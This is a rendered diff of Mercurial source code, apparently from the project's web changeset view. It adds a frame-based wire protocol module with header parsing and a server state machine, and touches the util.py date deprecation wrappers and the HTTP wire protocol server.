4303 >>> uvarintdecodestream(BytesIO(b'\\x01'))
4296 1
4304 1
4297 >>> uvarintdecodestream(BytesIO(b'\\x7f'))
4305 >>> uvarintdecodestream(BytesIO(b'\\x7f'))
4298 127
4306 127
4299 >>> uvarintdecodestream(BytesIO(b'\\xb9\\n'))
4307 >>> uvarintdecodestream(BytesIO(b'\\xb9\\n'))
4300 1337
4308 1337
4301 >>> uvarintdecodestream(BytesIO(b'\\x80\\x80\\x04'))
4309 >>> uvarintdecodestream(BytesIO(b'\\x80\\x80\\x04'))
4302 65536
4310 65536
4303 >>> uvarintdecodestream(BytesIO(b'\\x80'))
4311 >>> uvarintdecodestream(BytesIO(b'\\x80'))
4304 Traceback (most recent call last):
4312 Traceback (most recent call last):
4305 ...
4313 ...
4306 Abort: stream ended unexpectedly (got 0 bytes, expected 1)
4314 Abort: stream ended unexpectedly (got 0 bytes, expected 1)
4307 """
4315 """
4308 result = 0
4316 result = 0
4309 shift = 0
4317 shift = 0
4310 while True:
4318 while True:
4311 byte = ord(readexactly(fh, 1))
4319 byte = ord(readexactly(fh, 1))
4312 result |= ((byte & 0x7f) << shift)
4320 result |= ((byte & 0x7f) << shift)
4313 if not (byte & 0x80):
4321 if not (byte & 0x80):
4314 return result
4322 return result
4315 shift += 7
4323 shift += 7
4316
4324
4317 ###
4325 ###
4318 # Deprecation warnings for util.py splitting
4326 # Deprecation warnings for util.py splitting
4319 ###
4327 ###
4320
4328
4321 defaultdateformats = dateutil.defaultdateformats
4329 defaultdateformats = dateutil.defaultdateformats
4322
4330
4323 extendeddateformats = dateutil.extendeddateformats
4331 extendeddateformats = dateutil.extendeddateformats
4324
4332
4325 def makedate(*args, **kwargs):
4333 def makedate(*args, **kwargs):
4326 msg = ("'util.makedate' is deprecated, "
4334 msg = ("'util.makedate' is deprecated, "
4327 "use 'utils.dateutil.makedate'")
4335 "use 'utils.dateutil.makedate'")
4328 nouideprecwarn(msg, "4.6")
4336 nouideprecwarn(msg, "4.6")
4329 return dateutil.makedate(*args, **kwargs)
4337 return dateutil.makedate(*args, **kwargs)
4330
4338
4331 def datestr(*args, **kwargs):
4339 def datestr(*args, **kwargs):
4332 msg = ("'util.datestr' is deprecated, "
4340 msg = ("'util.datestr' is deprecated, "
4333 "use 'utils.dateutil.datestr'")
4341 "use 'utils.dateutil.datestr'")
4334 nouideprecwarn(msg, "4.6")
4342 nouideprecwarn(msg, "4.6")
4335 return dateutil.datestr(*args, **kwargs)
4343 return dateutil.datestr(*args, **kwargs)
4336
4344
4337 def shortdate(*args, **kwargs):
4345 def shortdate(*args, **kwargs):
4338 msg = ("'util.shortdate' is deprecated, "
4346 msg = ("'util.shortdate' is deprecated, "
4339 "use 'utils.dateutil.shortdate'")
4347 "use 'utils.dateutil.shortdate'")
4340 nouideprecwarn(msg, "4.6")
4348 nouideprecwarn(msg, "4.6")
4341 return dateutil.shortdate(*args, **kwargs)
4349 return dateutil.shortdate(*args, **kwargs)
4342
4350
4343 def parsetimezone(*args, **kwargs):
4351 def parsetimezone(*args, **kwargs):
4344 msg = ("'util.parsetimezone' is deprecated, "
4352 msg = ("'util.parsetimezone' is deprecated, "
4345 "use 'utils.dateutil.parsetimezone'")
4353 "use 'utils.dateutil.parsetimezone'")
4346 nouideprecwarn(msg, "4.6")
4354 nouideprecwarn(msg, "4.6")
4347 return dateutil.parsetimezone(*args, **kwargs)
4355 return dateutil.parsetimezone(*args, **kwargs)
4348
4356
4349 def strdate(*args, **kwargs):
4357 def strdate(*args, **kwargs):
4350 msg = ("'util.strdate' is deprecated, "
4358 msg = ("'util.strdate' is deprecated, "
4351 "use 'utils.dateutil.strdate'")
4359 "use 'utils.dateutil.strdate'")
4352 nouideprecwarn(msg, "4.6")
4360 nouideprecwarn(msg, "4.6")
4353 return dateutil.strdate(*args, **kwargs)
4361 return dateutil.strdate(*args, **kwargs)
4354
4362
4355 def parsedate(*args, **kwargs):
4363 def parsedate(*args, **kwargs):
4356 msg = ("'util.parsedate' is deprecated, "
4364 msg = ("'util.parsedate' is deprecated, "
4357 "use 'utils.dateutil.parsedate'")
4365 "use 'utils.dateutil.parsedate'")
4358 nouideprecwarn(msg, "4.6")
4366 nouideprecwarn(msg, "4.6")
4359 return dateutil.parsedate(*args, **kwargs)
4367 return dateutil.parsedate(*args, **kwargs)
4360
4368
4361 def matchdate(*args, **kwargs):
4369 def matchdate(*args, **kwargs):
4362 msg = ("'util.matchdate' is deprecated, "
4370 msg = ("'util.matchdate' is deprecated, "
4363 "use 'utils.dateutil.matchdate'")
4371 "use 'utils.dateutil.matchdate'")
4364 nouideprecwarn(msg, "4.6")
4372 nouideprecwarn(msg, "4.6")
4365 return dateutil.matchdate(*args, **kwargs)
4373 return dateutil.matchdate(*args, **kwargs)
@@ -1,156 +1,395 b''
1 # wireprotoframing.py - unified framing protocol for wire protocol
1 # wireprotoframing.py - unified framing protocol for wire protocol
2 #
2 #
3 # Copyright 2018 Gregory Szorc <gregory.szorc@gmail.com>
3 # Copyright 2018 Gregory Szorc <gregory.szorc@gmail.com>
4 #
4 #
5 # This software may be used and distributed according to the terms of the
5 # This software may be used and distributed according to the terms of the
6 # GNU General Public License version 2 or any later version.
6 # GNU General Public License version 2 or any later version.
7
7
8 # This file contains functionality to support the unified frame-based wire
8 # This file contains functionality to support the unified frame-based wire
9 # protocol. For details about the protocol, see
9 # protocol. For details about the protocol, see
10 # `hg help internals.wireprotocol`.
10 # `hg help internals.wireprotocol`.
11
11
12 from __future__ import absolute_import
12 from __future__ import absolute_import
13
13
14 import struct
14 import struct
15
15
16 from .i18n import _
16 from . import (
17 from . import (
18 error,
17 util,
19 util,
18 )
20 )
19
21
20 FRAME_HEADER_SIZE = 4
22 FRAME_HEADER_SIZE = 4
21 DEFAULT_MAX_FRAME_SIZE = 32768
23 DEFAULT_MAX_FRAME_SIZE = 32768
22
24
23 FRAME_TYPE_COMMAND_NAME = 0x01
25 FRAME_TYPE_COMMAND_NAME = 0x01
24 FRAME_TYPE_COMMAND_ARGUMENT = 0x02
26 FRAME_TYPE_COMMAND_ARGUMENT = 0x02
25 FRAME_TYPE_COMMAND_DATA = 0x03
27 FRAME_TYPE_COMMAND_DATA = 0x03
26
28
27 FRAME_TYPES = {
29 FRAME_TYPES = {
28 b'command-name': FRAME_TYPE_COMMAND_NAME,
30 b'command-name': FRAME_TYPE_COMMAND_NAME,
29 b'command-argument': FRAME_TYPE_COMMAND_ARGUMENT,
31 b'command-argument': FRAME_TYPE_COMMAND_ARGUMENT,
30 b'command-data': FRAME_TYPE_COMMAND_DATA,
32 b'command-data': FRAME_TYPE_COMMAND_DATA,
31 }
33 }
32
34
33 FLAG_COMMAND_NAME_EOS = 0x01
35 FLAG_COMMAND_NAME_EOS = 0x01
34 FLAG_COMMAND_NAME_HAVE_ARGS = 0x02
36 FLAG_COMMAND_NAME_HAVE_ARGS = 0x02
35 FLAG_COMMAND_NAME_HAVE_DATA = 0x04
37 FLAG_COMMAND_NAME_HAVE_DATA = 0x04
36
38
37 FLAGS_COMMAND = {
39 FLAGS_COMMAND = {
38 b'eos': FLAG_COMMAND_NAME_EOS,
40 b'eos': FLAG_COMMAND_NAME_EOS,
39 b'have-args': FLAG_COMMAND_NAME_HAVE_ARGS,
41 b'have-args': FLAG_COMMAND_NAME_HAVE_ARGS,
40 b'have-data': FLAG_COMMAND_NAME_HAVE_DATA,
42 b'have-data': FLAG_COMMAND_NAME_HAVE_DATA,
41 }
43 }
42
44
43 FLAG_COMMAND_ARGUMENT_CONTINUATION = 0x01
45 FLAG_COMMAND_ARGUMENT_CONTINUATION = 0x01
44 FLAG_COMMAND_ARGUMENT_EOA = 0x02
46 FLAG_COMMAND_ARGUMENT_EOA = 0x02
45
47
46 FLAGS_COMMAND_ARGUMENT = {
48 FLAGS_COMMAND_ARGUMENT = {
47 b'continuation': FLAG_COMMAND_ARGUMENT_CONTINUATION,
49 b'continuation': FLAG_COMMAND_ARGUMENT_CONTINUATION,
48 b'eoa': FLAG_COMMAND_ARGUMENT_EOA,
50 b'eoa': FLAG_COMMAND_ARGUMENT_EOA,
49 }
51 }
50
52
51 FLAG_COMMAND_DATA_CONTINUATION = 0x01
53 FLAG_COMMAND_DATA_CONTINUATION = 0x01
52 FLAG_COMMAND_DATA_EOS = 0x02
54 FLAG_COMMAND_DATA_EOS = 0x02
53
55
54 FLAGS_COMMAND_DATA = {
56 FLAGS_COMMAND_DATA = {
55 b'continuation': FLAG_COMMAND_DATA_CONTINUATION,
57 b'continuation': FLAG_COMMAND_DATA_CONTINUATION,
56 b'eos': FLAG_COMMAND_DATA_EOS,
58 b'eos': FLAG_COMMAND_DATA_EOS,
57 }
59 }
58
60
59 # Maps frame types to their available flags.
61 # Maps frame types to their available flags.
60 FRAME_TYPE_FLAGS = {
62 FRAME_TYPE_FLAGS = {
61 FRAME_TYPE_COMMAND_NAME: FLAGS_COMMAND,
63 FRAME_TYPE_COMMAND_NAME: FLAGS_COMMAND,
62 FRAME_TYPE_COMMAND_ARGUMENT: FLAGS_COMMAND_ARGUMENT,
64 FRAME_TYPE_COMMAND_ARGUMENT: FLAGS_COMMAND_ARGUMENT,
63 FRAME_TYPE_COMMAND_DATA: FLAGS_COMMAND_DATA,
65 FRAME_TYPE_COMMAND_DATA: FLAGS_COMMAND_DATA,
64 }
66 }
65
67
66 ARGUMENT_FRAME_HEADER = struct.Struct(r'<HH')
68 ARGUMENT_FRAME_HEADER = struct.Struct(r'<HH')
67
69
68 def makeframe(frametype, frameflags, payload):
70 def makeframe(frametype, frameflags, payload):
69 """Assemble a frame into a byte array."""
71 """Assemble a frame into a byte array."""
70 # TODO assert size of payload.
72 # TODO assert size of payload.
71 frame = bytearray(FRAME_HEADER_SIZE + len(payload))
73 frame = bytearray(FRAME_HEADER_SIZE + len(payload))
72
74
73 l = struct.pack(r'<I', len(payload))
75 l = struct.pack(r'<I', len(payload))
74 frame[0:3] = l[0:3]
76 frame[0:3] = l[0:3]
75 frame[3] = (frametype << 4) | frameflags
77 frame[3] = (frametype << 4) | frameflags
76 frame[4:] = payload
78 frame[4:] = payload
77
79
78 return frame
80 return frame
79
81
80 def makeframefromhumanstring(s):
82 def makeframefromhumanstring(s):
81 """Given a string of the form: <type> <flags> <payload>, creates a frame.
83 """Given a string of the form: <type> <flags> <payload>, creates a frame.
82
84
83 This can be used by user-facing applications and tests for creating
85 This can be used by user-facing applications and tests for creating
84 frames easily without having to type out a bunch of constants.
86 frames easily without having to type out a bunch of constants.
85
87
86 Frame type and flags can be specified by integer or named constant.
88 Frame type and flags can be specified by integer or named constant.
87 Flags can be delimited by `|` to bitwise OR them together.
89 Flags can be delimited by `|` to bitwise OR them together.
88 """
90 """
89 frametype, frameflags, payload = s.split(b' ', 2)
91 frametype, frameflags, payload = s.split(b' ', 2)
90
92
91 if frametype in FRAME_TYPES:
93 if frametype in FRAME_TYPES:
92 frametype = FRAME_TYPES[frametype]
94 frametype = FRAME_TYPES[frametype]
93 else:
95 else:
94 frametype = int(frametype)
96 frametype = int(frametype)
95
97
96 finalflags = 0
98 finalflags = 0
97 validflags = FRAME_TYPE_FLAGS[frametype]
99 validflags = FRAME_TYPE_FLAGS[frametype]
98 for flag in frameflags.split(b'|'):
100 for flag in frameflags.split(b'|'):
99 if flag in validflags:
101 if flag in validflags:
100 finalflags |= validflags[flag]
102 finalflags |= validflags[flag]
101 else:
103 else:
102 finalflags |= int(flag)
104 finalflags |= int(flag)
103
105
104 payload = util.unescapestr(payload)
106 payload = util.unescapestr(payload)
105
107
106 return makeframe(frametype, finalflags, payload)
108 return makeframe(frametype, finalflags, payload)
107
109
110 def parseheader(data):
111 """Parse a unified framing protocol frame header from a buffer.
112
113 The header is expected to be in the buffer at offset 0 and the
114 buffer is expected to be large enough to hold a full header.
115 """
116 # 24 bits payload length (little endian)
117 # 4 bits frame type
118 # 4 bits frame flags
119 # ... payload
120 framelength = data[0] + 256 * data[1] + 16384 * data[2]
121 typeflags = data[3]
122
123 frametype = (typeflags & 0xf0) >> 4
124 frameflags = typeflags & 0x0f
125
126 return frametype, frameflags, framelength
127
128 def readframe(fh):
129 """Read a unified framing protocol frame from a file object.
130
131 Returns a 3-tuple of (type, flags, payload) for the decoded frame or
132 None if no frame is available. May raise if a malformed frame is
133 seen.
134 """
135 header = bytearray(FRAME_HEADER_SIZE)
136
137 readcount = fh.readinto(header)
138
139 if readcount == 0:
140 return None
141
142 if readcount != FRAME_HEADER_SIZE:
143 raise error.Abort(_('received incomplete frame: got %d bytes: %s') %
144 (readcount, header))
145
146 frametype, frameflags, framelength = parseheader(header)
147
148 payload = fh.read(framelength)
149 if len(payload) != framelength:
150 raise error.Abort(_('frame length error: expected %d; got %d') %
151 (framelength, len(payload)))
152
153 return frametype, frameflags, payload
154
108 def createcommandframes(cmd, args, datafh=None):
155 def createcommandframes(cmd, args, datafh=None):
109 """Create frames necessary to transmit a request to run a command.
156 """Create frames necessary to transmit a request to run a command.
110
157
111 This is a generator of bytearrays. Each item represents a frame
158 This is a generator of bytearrays. Each item represents a frame
112 ready to be sent over the wire to a peer.
159 ready to be sent over the wire to a peer.
113 """
160 """
114 flags = 0
161 flags = 0
115 if args:
162 if args:
116 flags |= FLAG_COMMAND_NAME_HAVE_ARGS
163 flags |= FLAG_COMMAND_NAME_HAVE_ARGS
117 if datafh:
164 if datafh:
118 flags |= FLAG_COMMAND_NAME_HAVE_DATA
165 flags |= FLAG_COMMAND_NAME_HAVE_DATA
119
166
120 if not flags:
167 if not flags:
121 flags |= FLAG_COMMAND_NAME_EOS
168 flags |= FLAG_COMMAND_NAME_EOS
122
169
123 yield makeframe(FRAME_TYPE_COMMAND_NAME, flags, cmd)
170 yield makeframe(FRAME_TYPE_COMMAND_NAME, flags, cmd)
124
171
125 for i, k in enumerate(sorted(args)):
172 for i, k in enumerate(sorted(args)):
126 v = args[k]
173 v = args[k]
127 last = i == len(args) - 1
174 last = i == len(args) - 1
128
175
129 # TODO handle splitting of argument values across frames.
176 # TODO handle splitting of argument values across frames.
130 payload = bytearray(ARGUMENT_FRAME_HEADER.size + len(k) + len(v))
177 payload = bytearray(ARGUMENT_FRAME_HEADER.size + len(k) + len(v))
131 offset = 0
178 offset = 0
132 ARGUMENT_FRAME_HEADER.pack_into(payload, offset, len(k), len(v))
179 ARGUMENT_FRAME_HEADER.pack_into(payload, offset, len(k), len(v))
133 offset += ARGUMENT_FRAME_HEADER.size
180 offset += ARGUMENT_FRAME_HEADER.size
134 payload[offset:offset + len(k)] = k
181 payload[offset:offset + len(k)] = k
135 offset += len(k)
182 offset += len(k)
136 payload[offset:offset + len(v)] = v
183 payload[offset:offset + len(v)] = v
137
184
138 flags = FLAG_COMMAND_ARGUMENT_EOA if last else 0
185 flags = FLAG_COMMAND_ARGUMENT_EOA if last else 0
139 yield makeframe(FRAME_TYPE_COMMAND_ARGUMENT, flags, payload)
186 yield makeframe(FRAME_TYPE_COMMAND_ARGUMENT, flags, payload)
140
187
141 if datafh:
188 if datafh:
142 while True:
189 while True:
143 data = datafh.read(DEFAULT_MAX_FRAME_SIZE)
190 data = datafh.read(DEFAULT_MAX_FRAME_SIZE)
144
191
145 done = False
192 done = False
146 if len(data) == DEFAULT_MAX_FRAME_SIZE:
193 if len(data) == DEFAULT_MAX_FRAME_SIZE:
147 flags = FLAG_COMMAND_DATA_CONTINUATION
194 flags = FLAG_COMMAND_DATA_CONTINUATION
148 else:
195 else:
149 flags = FLAG_COMMAND_DATA_EOS
196 flags = FLAG_COMMAND_DATA_EOS
150 assert datafh.read(1) == b''
197 assert datafh.read(1) == b''
151 done = True
198 done = True
152
199
153 yield makeframe(FRAME_TYPE_COMMAND_DATA, flags, data)
200 yield makeframe(FRAME_TYPE_COMMAND_DATA, flags, data)
154
201
155 if done:
202 if done:
156 break
203 break
204
205 class serverreactor(object):
206 """Holds state of a server handling frame-based protocol requests.
207
208 This class is the "brain" of the unified frame-based protocol server
209 component. While the protocol is stateless from the perspective of
210 requests/commands, something needs to track which frames have been
211 received, what frames to expect, etc. This class is that thing.
212
213 Instances are modeled as a state machine of sorts. Instances are also
214 reactionary to external events. The point of this class is to encapsulate
215 the state of the connection and the exchange of frames, not to perform
216 work. Instead, callers tell this class when something occurs, like a
217 frame arriving. If that activity is worthy of a follow-up action (say
218 *run a command*), the return value of that handler will say so.
219
220 I/O and CPU intensive operations are purposefully delegated outside of
221 this class.
222
223 Consumers are expected to tell instances when events occur. They do so by
224 calling the various ``on*`` methods. These methods return a 2-tuple
225 describing any follow-up action(s) to take. The first element is the
226 name of an action to perform. The second is a data structure (usually
227 a dict) specific to that action that contains more information. e.g.
228 if the server wants to send frames back to the client, the data structure
229 will contain a reference to those frames.
230
231 Valid actions that consumers can be instructed to take are:
232
233 error
234 Indicates that an error occurred. Consumer should probably abort.
235
236 runcommand
237 Indicates that the consumer should run a wire protocol command. Details
238 of the command to run are given in the data structure.
239
240 wantframe
241 Indicates that nothing of interest happened and the server is waiting on
242 more frames from the client before anything interesting can be done.
243 """
244
245 def __init__(self):
246 self._state = 'idle'
247 self._activecommand = None
248 self._activeargs = None
249 self._activedata = None
250 self._expectingargs = None
251 self._expectingdata = None
252 self._activeargname = None
253 self._activeargchunks = None
254
255 def onframerecv(self, frametype, frameflags, payload):
256 """Process a frame that has been received off the wire.
257
258 Returns a dict with an ``action`` key that details what action,
259 if any, the consumer should take next.
260 """
261 handlers = {
262 'idle': self._onframeidle,
263 'command-receiving-args': self._onframereceivingargs,
264 'command-receiving-data': self._onframereceivingdata,
265 'errored': self._onframeerrored,
266 }
267
268 meth = handlers.get(self._state)
269 if not meth:
270 raise error.ProgrammingError('unhandled state: %s' % self._state)
271
272 return meth(frametype, frameflags, payload)
273
274 def _makeerrorresult(self, msg):
275 return 'error', {
276 'message': msg,
277 }
278
279 def _makeruncommandresult(self):
280 return 'runcommand', {
281 'command': self._activecommand,
282 'args': self._activeargs,
283 'data': self._activedata.getvalue() if self._activedata else None,
284 }
285
286 def _makewantframeresult(self):
287 return 'wantframe', {
288 'state': self._state,
289 }
290
291 def _onframeidle(self, frametype, frameflags, payload):
292 # The only frame type that should be received in this state is a
293 # command request.
294 if frametype != FRAME_TYPE_COMMAND_NAME:
295 self._state = 'errored'
296 return self._makeerrorresult(
297 _('expected command frame; got %d') % frametype)
298
299 self._activecommand = payload
300 self._activeargs = {}
301 self._activedata = None
302
303 if frameflags & FLAG_COMMAND_NAME_EOS:
304 return self._makeruncommandresult()
305
306 self._expectingargs = bool(frameflags & FLAG_COMMAND_NAME_HAVE_ARGS)
307 self._expectingdata = bool(frameflags & FLAG_COMMAND_NAME_HAVE_DATA)
308
309 if self._expectingargs:
310 self._state = 'command-receiving-args'
311 return self._makewantframeresult()
312 elif self._expectingdata:
313 self._activedata = util.bytesio()
314 self._state = 'command-receiving-data'
315 return self._makewantframeresult()
316 else:
317 self._state = 'errored'
318 return self._makeerrorresult(_('missing frame flags on '
319 'command frame'))
320
321 def _onframereceivingargs(self, frametype, frameflags, payload):
322 if frametype != FRAME_TYPE_COMMAND_ARGUMENT:
323 self._state = 'errored'
324 return self._makeerrorresult(_('expected command argument '
325 'frame; got %d') % frametype)
326
327 offset = 0
328 namesize, valuesize = ARGUMENT_FRAME_HEADER.unpack_from(payload)
329 offset += ARGUMENT_FRAME_HEADER.size
330
331 # The argument name MUST fit inside the frame.
332 argname = bytes(payload[offset:offset + namesize])
333 offset += namesize
334
335 if len(argname) != namesize:
336 self._state = 'errored'
337 return self._makeerrorresult(_('malformed argument frame: '
338 'partial argument name'))
339
340 argvalue = bytes(payload[offset:])
341
342 # Argument value spans multiple frames. Record our active state
343 # and wait for the next frame.
344 if frameflags & FLAG_COMMAND_ARGUMENT_CONTINUATION:
345 raise error.ProgrammingError('not yet implemented')
346 self._activeargname = argname
347 self._activeargchunks = [argvalue]
348 self._state = 'command-arg-continuation'
349 return self._makewantframeresult()
350
351 # Common case: the argument value is completely contained in this
352 # frame.
353
354 if len(argvalue) != valuesize:
355 self._state = 'errored'
356 return self._makeerrorresult(_('malformed argument frame: '
357 'partial argument value'))
358
359 self._activeargs[argname] = argvalue
360
361 if frameflags & FLAG_COMMAND_ARGUMENT_EOA:
362 if self._expectingdata:
363 self._state = 'command-receiving-data'
364 self._activedata = util.bytesio()
365 # TODO signal request to run a command once we don't
366 # buffer data frames.
367 return self._makewantframeresult()
368 else:
369 self._state = 'waiting'
370 return self._makeruncommandresult()
371 else:
372 return self._makewantframeresult()
373
374 def _onframereceivingdata(self, frametype, frameflags, payload):
375 if frametype != FRAME_TYPE_COMMAND_DATA:
376 self._state = 'errored'
377 return self._makeerrorresult(_('expected command data frame; '
378 'got %d') % frametype)
379
380 # TODO support streaming data instead of buffering it.
381 self._activedata.write(payload)
382
383 if frameflags & FLAG_COMMAND_DATA_CONTINUATION:
384 return self._makewantframeresult()
385 elif frameflags & FLAG_COMMAND_DATA_EOS:
386 self._activedata.seek(0)
387 self._state = 'idle'
388 return self._makeruncommandresult()
389 else:
390 self._state = 'errored'
391 return self._makeerrorresult(_('command data frame without '
392 'flags'))
393
394 def _onframeerrored(self, frametype, frameflags, payload):
395 return self._makeerrorresult(_('server already errored'))
@@ -1,833 +1,881 b''
1 # Copyright 21 May 2005 - (c) 2005 Jake Edge <jake@edge2.net>
1 # Copyright 21 May 2005 - (c) 2005 Jake Edge <jake@edge2.net>
2 # Copyright 2005-2007 Matt Mackall <mpm@selenic.com>
2 # Copyright 2005-2007 Matt Mackall <mpm@selenic.com>
3 #
3 #
4 # This software may be used and distributed according to the terms of the
4 # This software may be used and distributed according to the terms of the
5 # GNU General Public License version 2 or any later version.
5 # GNU General Public License version 2 or any later version.
6
6
7 from __future__ import absolute_import
7 from __future__ import absolute_import
8
8
9 import contextlib
9 import contextlib
10 import struct
10 import struct
11 import sys
11 import sys
12 import threading
12 import threading
13
13
14 from .i18n import _
14 from .i18n import _
15 from . import (
15 from . import (
16 encoding,
16 encoding,
17 error,
17 error,
18 hook,
18 hook,
19 pycompat,
19 pycompat,
20 util,
20 util,
21 wireproto,
21 wireproto,
22 wireprotoframing,
22 wireprototypes,
23 wireprototypes,
23 )
24 )
24
25
25 stringio = util.stringio
26 stringio = util.stringio
26
27
27 urlerr = util.urlerr
28 urlerr = util.urlerr
28 urlreq = util.urlreq
29 urlreq = util.urlreq
29
30
30 HTTP_OK = 200
31 HTTP_OK = 200
31
32
32 HGTYPE = 'application/mercurial-0.1'
33 HGTYPE = 'application/mercurial-0.1'
33 HGTYPE2 = 'application/mercurial-0.2'
34 HGTYPE2 = 'application/mercurial-0.2'
34 HGERRTYPE = 'application/hg-error'
35 HGERRTYPE = 'application/hg-error'
35 FRAMINGTYPE = b'application/mercurial-exp-framing-0001'
36 FRAMINGTYPE = b'application/mercurial-exp-framing-0001'
36
37
37 HTTPV2 = wireprototypes.HTTPV2
38 HTTPV2 = wireprototypes.HTTPV2
38 SSHV1 = wireprototypes.SSHV1
39 SSHV1 = wireprototypes.SSHV1
39 SSHV2 = wireprototypes.SSHV2
40 SSHV2 = wireprototypes.SSHV2
40
41
41 def decodevaluefromheaders(req, headerprefix):
42 def decodevaluefromheaders(req, headerprefix):
42 """Decode a long value from multiple HTTP request headers.
43 """Decode a long value from multiple HTTP request headers.
43
44
44 Returns the value as a bytes, not a str.
45 Returns the value as a bytes, not a str.
45 """
46 """
46 chunks = []
47 chunks = []
47 i = 1
48 i = 1
48 while True:
49 while True:
49 v = req.headers.get(b'%s-%d' % (headerprefix, i))
50 v = req.headers.get(b'%s-%d' % (headerprefix, i))
50 if v is None:
51 if v is None:
51 break
52 break
52 chunks.append(pycompat.bytesurl(v))
53 chunks.append(pycompat.bytesurl(v))
53 i += 1
54 i += 1
54
55
55 return ''.join(chunks)
56 return ''.join(chunks)
56
57
57 class httpv1protocolhandler(wireprototypes.baseprotocolhandler):
58 class httpv1protocolhandler(wireprototypes.baseprotocolhandler):
58 def __init__(self, req, ui, checkperm):
59 def __init__(self, req, ui, checkperm):
59 self._req = req
60 self._req = req
60 self._ui = ui
61 self._ui = ui
61 self._checkperm = checkperm
62 self._checkperm = checkperm
62
63
63 @property
64 @property
64 def name(self):
65 def name(self):
65 return 'http-v1'
66 return 'http-v1'
66
67
67 def getargs(self, args):
68 def getargs(self, args):
68 knownargs = self._args()
69 knownargs = self._args()
69 data = {}
70 data = {}
70 keys = args.split()
71 keys = args.split()
71 for k in keys:
72 for k in keys:
72 if k == '*':
73 if k == '*':
73 star = {}
74 star = {}
74 for key in knownargs.keys():
75 for key in knownargs.keys():
75 if key != 'cmd' and key not in keys:
76 if key != 'cmd' and key not in keys:
76 star[key] = knownargs[key][0]
77 star[key] = knownargs[key][0]
77 data['*'] = star
78 data['*'] = star
78 else:
79 else:
79 data[k] = knownargs[k][0]
80 data[k] = knownargs[k][0]
80 return [data[k] for k in keys]
81 return [data[k] for k in keys]
81
82
82 def _args(self):
83 def _args(self):
83 args = self._req.qsparams.asdictoflists()
84 args = self._req.qsparams.asdictoflists()
84 postlen = int(self._req.headers.get(b'X-HgArgs-Post', 0))
85 postlen = int(self._req.headers.get(b'X-HgArgs-Post', 0))
85 if postlen:
86 if postlen:
86 args.update(urlreq.parseqs(
87 args.update(urlreq.parseqs(
87 self._req.bodyfh.read(postlen), keep_blank_values=True))
88 self._req.bodyfh.read(postlen), keep_blank_values=True))
88 return args
89 return args
89
90
90 argvalue = decodevaluefromheaders(self._req, b'X-HgArg')
91 argvalue = decodevaluefromheaders(self._req, b'X-HgArg')
91 args.update(urlreq.parseqs(argvalue, keep_blank_values=True))
92 args.update(urlreq.parseqs(argvalue, keep_blank_values=True))
92 return args
93 return args
93
94
94 def forwardpayload(self, fp):
95 def forwardpayload(self, fp):
95 # Existing clients *always* send Content-Length.
96 # Existing clients *always* send Content-Length.
96 length = int(self._req.headers[b'Content-Length'])
97 length = int(self._req.headers[b'Content-Length'])
97
98
98 # If httppostargs is used, we need to read Content-Length
99 # If httppostargs is used, we need to read Content-Length
99 # minus the amount that was consumed by args.
100 # minus the amount that was consumed by args.
100 length -= int(self._req.headers.get(b'X-HgArgs-Post', 0))
101 length -= int(self._req.headers.get(b'X-HgArgs-Post', 0))
101 for s in util.filechunkiter(self._req.bodyfh, limit=length):
102 for s in util.filechunkiter(self._req.bodyfh, limit=length):
102 fp.write(s)
103 fp.write(s)
103
104
104 @contextlib.contextmanager
105 @contextlib.contextmanager
105 def mayberedirectstdio(self):
106 def mayberedirectstdio(self):
106 oldout = self._ui.fout
107 oldout = self._ui.fout
107 olderr = self._ui.ferr
108 olderr = self._ui.ferr
108
109
109 out = util.stringio()
110 out = util.stringio()
110
111
111 try:
112 try:
112 self._ui.fout = out
113 self._ui.fout = out
113 self._ui.ferr = out
114 self._ui.ferr = out
114 yield out
115 yield out
115 finally:
116 finally:
116 self._ui.fout = oldout
117 self._ui.fout = oldout
117 self._ui.ferr = olderr
118 self._ui.ferr = olderr
118
119
119 def client(self):
120 def client(self):
120 return 'remote:%s:%s:%s' % (
121 return 'remote:%s:%s:%s' % (
121 self._req.urlscheme,
122 self._req.urlscheme,
122 urlreq.quote(self._req.remotehost or ''),
123 urlreq.quote(self._req.remotehost or ''),
123 urlreq.quote(self._req.remoteuser or ''))
124 urlreq.quote(self._req.remoteuser or ''))
124
125
125 def addcapabilities(self, repo, caps):
126 def addcapabilities(self, repo, caps):
126 caps.append('httpheader=%d' %
127 caps.append('httpheader=%d' %
127 repo.ui.configint('server', 'maxhttpheaderlen'))
128 repo.ui.configint('server', 'maxhttpheaderlen'))
128 if repo.ui.configbool('experimental', 'httppostargs'):
129 if repo.ui.configbool('experimental', 'httppostargs'):
129 caps.append('httppostargs')
130 caps.append('httppostargs')
130
131
131 # FUTURE advertise 0.2rx once support is implemented
132 # FUTURE advertise 0.2rx once support is implemented
132 # FUTURE advertise minrx and mintx after consulting config option
133 # FUTURE advertise minrx and mintx after consulting config option
133 caps.append('httpmediatype=0.1rx,0.1tx,0.2tx')
134 caps.append('httpmediatype=0.1rx,0.1tx,0.2tx')
134
135
135 compengines = wireproto.supportedcompengines(repo.ui, util.SERVERROLE)
136 compengines = wireproto.supportedcompengines(repo.ui, util.SERVERROLE)
136 if compengines:
137 if compengines:
137 comptypes = ','.join(urlreq.quote(e.wireprotosupport().name)
138 comptypes = ','.join(urlreq.quote(e.wireprotosupport().name)
138 for e in compengines)
139 for e in compengines)
139 caps.append('compression=%s' % comptypes)
140 caps.append('compression=%s' % comptypes)
140
141
141 return caps
142 return caps
142
143
143 def checkperm(self, perm):
144 def checkperm(self, perm):
144 return self._checkperm(perm)
145 return self._checkperm(perm)
145
146
146 # This method exists mostly so that extensions like remotefilelog can
147 # This method exists mostly so that extensions like remotefilelog can
147 # disable a kludgey legacy method only over http. As of early 2018,
148 # disable a kludgey legacy method only over http. As of early 2018,
148 # there are no other known users, so with any luck we can discard this
149 # there are no other known users, so with any luck we can discard this
149 # hook if remotefilelog becomes a first-party extension.
150 # hook if remotefilelog becomes a first-party extension.
150 def iscmd(cmd):
151 def iscmd(cmd):
151 return cmd in wireproto.commands
152 return cmd in wireproto.commands
152
153
153 def handlewsgirequest(rctx, req, res, checkperm):
154 def handlewsgirequest(rctx, req, res, checkperm):
154 """Possibly process a wire protocol request.
155 """Possibly process a wire protocol request.
155
156
156 If the current request is a wire protocol request, the request is
157 If the current request is a wire protocol request, the request is
157 processed by this function.
158 processed by this function.
158
159
159 ``req`` is a ``parsedrequest`` instance.
160 ``req`` is a ``parsedrequest`` instance.
160 ``res`` is a ``wsgiresponse`` instance.
161 ``res`` is a ``wsgiresponse`` instance.
161
162
162 Returns a bool indicating if the request was serviced. If set, the caller
